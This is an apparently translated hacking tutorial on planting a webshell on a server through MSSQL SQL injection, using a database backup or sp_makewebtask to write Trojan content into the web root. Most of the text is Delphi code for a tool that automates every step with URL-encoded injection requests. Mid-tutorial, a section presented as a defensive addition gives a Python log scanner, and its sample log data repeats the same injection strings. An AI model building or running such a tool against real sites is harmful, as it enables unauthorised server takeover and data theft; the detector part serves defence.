Obtain WEBSHELL through SQL Injection

Source: Internet
Author: User

1. How to obtain a WEBSHELL through SQL injection:
N.E.V.E.R's method: use the database backup feature to obtain a WEBSHELL. Create a table with one field to hold the Trojan (webshell) data, use MSSQL to back up the whole database to a file, and then delete the new table.
Analysis: N.E.V.E.R uses MSSQL's backup-database function to export the data. Suppose the database contains ASP markers such as <%: the exported file is saved with an .ASP extension under the WEB path. Will the exported ASP file interpret the statements inside <% %>? If some tables in the database already contain a <% marker and an error occurs there, the exported ASP file will also be broken. However, the chance of this is not great either.
Let's look at CZY's method.
CZY's method: the first steps are the same as N.E.V.E.R's; the difference is that the extended stored procedure sp_makewebtask is used afterwards. This extended stored procedure exports the records of a table in the MSSQL database and saves them to a file. This method causes no problems because we only read the value of one field of the table and export that field's contents to generate the file. The values in this field were all just added by us; when adding the data, debug it first and add it only if it is fine, so the export will not have any problem.
I have manually tested both methods above: use the SQL injection vulnerability to create a table, add data to the table, export the data, and delete the table. All of these are SQL statements, so I will not go into them here; you can read this article.
2. Implementing the functions with DELPHI
The principles have been analyzed. How can we use DELPHI to automate these manual operations? The method is actually very simple: DELPHI provides an NMHTTP control that we can use to submit parameters to a specific URL, which implements our automatic injection function. The program I am about to explain has one special feature, which could also be called a defect: it does not automatically guess the absolute path of the WEB root, and it does not determine the permissions of the account currently connected to the SQL database. Why did I do this? Obtaining these two things through SQL injection is very difficult, so our program does not consider too many commands. If it does not succeed, you can check for yourself whether the file was generated.
3. Using DELPHI to obtain a WEBSHELL
The values used by the program: the URL path and the remote absolute WEB path (which can be obtained through other methods; you must have your own way), and the method used to get the WEBSHELL (that is, which of the two methods you choose). We also need a button to start executing the commands and a button to terminate the current task. Then there are the name of the table to create, the field name, and the field type. The first inputs and the selection control go directly on the main form; for the rest we add a settings button that brings up the corresponding settings form, and use a RECORD to save these settings.
First, let's place the EDIT controls. Their names are: urlET // the URL path input box, ShellPathET // remote Trojan location, and CustomBdoorET // custom Trojan location. Then two RadioButtons to choose how the WEBSHELL is obtained, with the CAPTIONs BackUP DataBase and WEB job. Then three SpeedButtons, named Set, Start and Stop, and finally a MEMO control to display information about what is currently being added. The interface work is complete.
Now let's write the program.
First, we define a RECORD as follows:
Type
  SetOption = Record
    TableName: String;  // saves the name of the table to be created
    FieldName: String;  // saves the name of the field to be created
    FiledType: String;  // saves the type of that field
  End;
The FiledType value is one of the following MSSQL field types:
bigint, binary, bit, char, datetime, decimal, float, image, int, money, nchar, ntext, numeric, nvarchar, real, smalldatetime, smallint, smallmoney, sql_variant, text, timestamp, tinyint, uniqueidentifier, varbinary, varchar.
Define the global variables:
Var
  SOption: SetOption;  // the settings record filled in below
  IsStop: Boolean;     // used to determine whether the user has pressed the Stop button
OK. During form creation, we fill the RECORD with its default values.
The code is as follows:
Procedure TMainForm.FormCreate(Sender: TObject);
Begin
  SOption.TableName := 'cyfd';
  SOption.FieldName := 'gmemo';
  SOption.FiledType := 'text';
End;
Now we add the code that starts executing the commands.
First, define BDoorList as a TStringList; its main purpose is to hold the Trojan content.
Create two variables, Url and ShellPath, to save the values of urlET and ShellPathET.
Before running, check the user input.
Define a CheckInput function as follows:
Function CheckInput: Boolean;
Begin
  Result := False;
  If Trim(urlET.Text) = '' then
  Begin
    Application.MessageBox('Enter the URL address!', 'Hint', MB_OK + MB_ICONINFORMATION);
    Exit;
  End;
  If Trim(ShellPathET.Text) = '' then
  Begin
    Application.MessageBox('Enter the file storage address!', 'Hint', MB_OK + MB_ICONINFORMATION);
    Exit;
  End;
  If DefBDoor.Checked then  // the default Trojan file next to the EXE is used
  Begin
    If Not FileExists(ExtractFilePath(Application.ExeName) + 'trojan.txt') then
    Begin
      Application.MessageBox('The Trojan file cannot be found!', 'Hint', MB_OK + MB_ICONINFORMATION);
      Exit;
    End;
  End
  Else
    If Not FileExists(CustomBdoorET.Text) then  // a custom Trojan file was chosen
    Begin
      Application.MessageBox('The selected Trojan file is not found!', 'Hint', MB_OK + MB_ICONINFORMATION);
      Exit;
    End;
  Result := True;
End;
First add:
If Not CheckInput then Exit;  // exit the procedure if the input is invalid
If there is nothing wrong with the user input, we come to the following code.
First, set IsStop to False and create BDoorList:
BDoorList := TStringList.Create;
Load the Trojan content into BDoorList:
BDoorList.LoadFromFile(CustomBdoorET.Text);
Here I would like to point something out: when submitting data with NMHTTP, certain special characters in the input must be encoded. Here we replace the % symbol and the space with their URL encodings, %25 and %20 respectively (the % symbol must be replaced first); otherwise the data will not be added.
The code is as follows:
BDoorList.Text := StringReplace(BDoorList.Text, '%', '%25', [rfReplaceAll]);
BDoorList.Text := StringReplace(BDoorList.Text, ' ', '%20', [rfReplaceAll]);
Next, the table-creation step:
Memo.Lines.Add('create a table ...');
Memo.Lines.Add('');
NMHttp.Get(Url + 'create%20TABLE%20[dbo].[' + sOption.TableName + ']%20([' + sOption.FieldName + ']%20[' + sOption.FiledType + ']);');
In this way the table is created. Then we add records to the table.
The code is as follows:
Memo.Lines.Add('add data ...');
Memo.Lines.Add('');
For I := 0 to BDoorList.Count - 1 do  // a loop adds the Trojan content to the table line by line
Begin
  If IsStop then  // if the Stop button was clicked, terminate the task
  Begin
    BDoorList.Free;
    Exit;
  End;
  NMHttp.Get(Url + 'insert%20into%20' + sOption.TableName + '%20(' + sOption.FieldName + ')%20values%20(''' + BDoorList.Strings[I] + ''');');
  Memo.Lines.Add('addline' + IntToStr(I + 1));
End;
Now export the data to generate the Trojan file.
Memo.Lines.Add('export data ...');
Memo.Lines.Add('');
If BKData.Checked then  // if Backup Database is selected, run the following command
  NMHttp.Get(Url + 'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk=''' + ShellPath + '''')
Else  // otherwise use the WEB job form
  NMHttp.Get(Url + 'execute%20sp_makewebtask%20@outputfile=''' + ShellPath + ''',@query=''' + 'select%20' + sOption.FieldName + '%20from%20' + sOption.TableName + '''');
Finally, we delete the newly created table:
NMHttp.Get(Url + 'drop%20TABLE%20[dbo].[' + sOption.TableName + '];');
This completes the task. Release the variable:
BDoorList.Free;
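As an added defensive example (not part of the original article or its tool), the following Python script scans web-server access-log lines for the exact staging sequence described above (CREATE TABLE, INSERT ... VALUES, BACKUP DATABASE ... TO DISK or sp_makewebtask @outputfile, DROP TABLE), URL-decoding the %20/%25 encoding the tool emits before matching. The log lines, client IPs and paths are constructed for the example.

```python
"""Flag clients whose requests walk through the MSSQL webshell-staging
sequence: create table -> insert rows -> export (backup / sp_makewebtask)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in common log format; payload text is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2004:10:00:01] "GET /news.asp?id=1 HTTP/1.0" 200 512
10.0.0.9 - - [01/Jan/2004:10:00:02] "GET /news.asp?id=1;create%20TABLE%20[dbo].[cyfd]%20([gmemo]%20[text]); HTTP/1.0" 500 0
10.0.0.9 - - [01/Jan/2004:10:00:03] "GET /news.asp?id=1;insert%20into%20cyfd%20(gmemo)%20values%20('%3C%25%20PLACEHOLDER%20%25%3E'); HTTP/1.0" 500 0
10.0.0.9 - - [01/Jan/2004:10:00:04] "GET /news.asp?id=1;declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='c:\\web\\x.asp' HTTP/1.0" 500 0
10.0.0.9 - - [01/Jan/2004:10:00:05] "GET /news.asp?id=1;drop%20TABLE%20[dbo].[cyfd]; HTTP/1.0" 500 0
"""

# Each stage: (name, regex applied to the URL-decoded, lowercased query string)
STAGES = [
    ("create_table", re.compile(r"\bcreate\s+table\b")),
    ("insert_rows", re.compile(r"\binsert\s+into\b.*\bvalues\b")),
    ("export_backup", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\s*=")),
    ("export_webtask", re.compile(r"\bsp_makewebtask\b.*@outputfile\s*=")),
    ("drop_table", re.compile(r"\bdrop\s+table\b")),
]
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def stages_in_request(raw_url):
    """Return the stage names matched by one request URL (query part only)."""
    query = unquote_plus(raw_url.split("?", 1)[1]).lower() if "?" in raw_url else ""
    return [name for name, rx in STAGES if rx.search(query)]

def detect(log_text):
    """Map client IP -> ordered stages seen, keeping only clients that
    created and populated a table and then reached an export stage."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, url = m.groups()
        for name in stages_in_request(url):
            if name not in seen[ip]:
                seen[ip].append(name)
    return {ip: st for ip, st in seen.items()
            if "create_table" in st and "insert_rows" in st
            and ("export_backup" in st or "export_webtask" in st)}

if __name__ == "__main__":
    for ip, stages in detect(SAMPLE_LOG).items():
        print(ip, "->", " , ".join(stages))
```

A single CREATE TABLE or DROP TABLE in a query string is already worth an alert; requiring the full sequence per client keeps the example focused on the staging pattern this article automates.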
Then add a click event to the Stop button. One line of code is enough:
IsStop := True;
With this, the main form is basically complete. Now let's look at the settings form. It is actually very simple: a record has already been defined in the main form, and we only need to assign the new values entered by the user to that RECORD.
In the settings form, first reference the main form. Then add two EDIT controls to the interface:
The first is named TableNameET // saves the temporary table name entered by the user.
The second is named FieldNameET // saves the field name entered by the user.
Add a ComboBox named FieldTypeCombox // saves the field type selected by the user.
OK, that completes the interface.
The code is as follows. Define a procedure that the main form calls to show the settings:
Procedure ShowSet;
Begin
  Application.CreateForm(TSetForm, SetForm);
  With SetForm do
  Begin
    TableNameET.Text := sOption.TableName;
    FieldNameET.Text := sOption.FieldName;
    FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
  End;
  SetForm.ShowModal;
  SetForm.Free;
End;
Call ShowSet from the click event of the Set button in the main form.
In the settings form, the click event of the OK button is:
If CheckInput then
Begin
  SOption.TableName := Trim(TableNameET.Text);  // assign the user input to the RECORD
  SOption.FieldName := Trim(FieldNameET.Text);
  SOption.FiledType := FieldTypeCombox.Text;
  Close;
End;
This is a second CheckInput, used to check whether the values entered by the user are valid.
The code is as follows:
Function CheckInput: Boolean;
Begin
  Result := False;
  If Trim(TableNameET.Text) = '' then
  Begin
    Application.MessageBox('Enter the temporary table name!', 'Hint', MB_OK + MB_ICONINFORMATION);
    Exit;
  End;
  If Trim(FieldNameET.Text) = '' then
  Begin
    Application.MessageBox('Enter the field name!', 'Hint', MB_OK + MB_ICONINFORMATION);
    Exit;
  End;
  Result := True;
End;
The program is finished here.
